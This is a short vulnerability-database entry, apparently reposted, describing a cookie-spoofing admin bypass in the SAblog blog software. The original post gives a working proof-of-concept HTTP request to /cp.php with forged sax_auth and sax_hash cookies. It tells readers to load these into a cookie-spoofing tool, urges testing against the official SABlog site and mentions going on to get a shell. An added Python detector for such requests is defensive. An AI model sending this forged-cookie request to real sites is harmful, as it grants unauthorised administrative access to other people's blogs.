SAblog admin backend permission spoofing vulnerability: simple usage method

ID MYHACK58:62201026230
Type myhack58
Reporter Anonymous
Modified 2010-02-25T00:00:00


Vulnerability analysis article:<>

We may as well use this POC and test it against the official SABlog! As far as I know, the author of SAblog is the creator of Security Angels!

First of all, open the cookie spoofing tool developed by Guilin Veteran!

The given POC:

    GET /cp.php HTTP/1.1
    Host:
    Connection: Close
    Cookie: sax_auth=MQkJ;sax_hash=abcdef;

The tool has a cookie field; click the lock there and enter sax_auth=MQkJ;sax_hash=abcdef;

Using it is that simple, but getting a shell is more difficult.
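For defenders, the POC cookie is easy to recognise: MQkJ is the base64 encoding of the character 1 followed by two tab characters, that is, a first field with two empty fields after it. The Python check below is an added example, not code from the original post or from the SAblog project; it flags requests to /cp.php whose sax_auth decodes to that shape. The meaning of the fields, the host name blog.example and the "normal" sample request are assumptions constructed for illustration.

```python
import base64
import binascii
from urllib.parse import unquote

ADMIN_PATH = "/cp.php"  # admin page requested by the POC on this page

def parse_request(raw):
    """Return (path, cookies) from a raw HTTP request, or None if malformed."""
    lines = raw.replace("\r\n", "\n").split("\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    cookies = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        if name.strip().lower() == "cookie":
            for pair in value.split(";"):
                key, sep, val = pair.strip().partition("=")
                if sep:
                    cookies[key] = unquote(val)
    return parts[1].split("?", 1)[0], cookies

def decode_auth(value):
    """Base64-decode a sax_auth value; None if it is not valid base64."""
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.b64decode(padded, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None

def is_suspicious(raw):
    """Flag admin-page requests whose sax_auth has empty fields after the first."""
    parsed = parse_request(raw)
    if parsed is None or parsed[0] != ADMIN_PATH:
        return False
    decoded = decode_auth(parsed[1].get("sax_auth", ""))
    if not decoded:
        return False
    fields = decoded.split("\t")
    return len(fields) > 1 and "" in fields[1:]

# Constructed samples: the host name and the "normal" field values are assumptions.
POC_REQUEST = ("GET /cp.php HTTP/1.1\r\nHost: blog.example\r\nConnection: Close\r\n"
               "Cookie: sax_auth=MQkJ;sax_hash=abcdef;\r\n\r\n")
NORMAL_AUTH = base64.b64encode(b"1\tfield2\tfield3").decode()
NORMAL_REQUEST = ("GET /cp.php HTTP/1.1\r\nHost: blog.example\r\n"
                  f"Cookie: sax_auth={NORMAL_AUTH}; sax_hash=abcdef\r\n\r\n")

if __name__ == "__main__":
    print(is_suspicious(POC_REQUEST), is_suspicious(NORMAL_REQUEST))
```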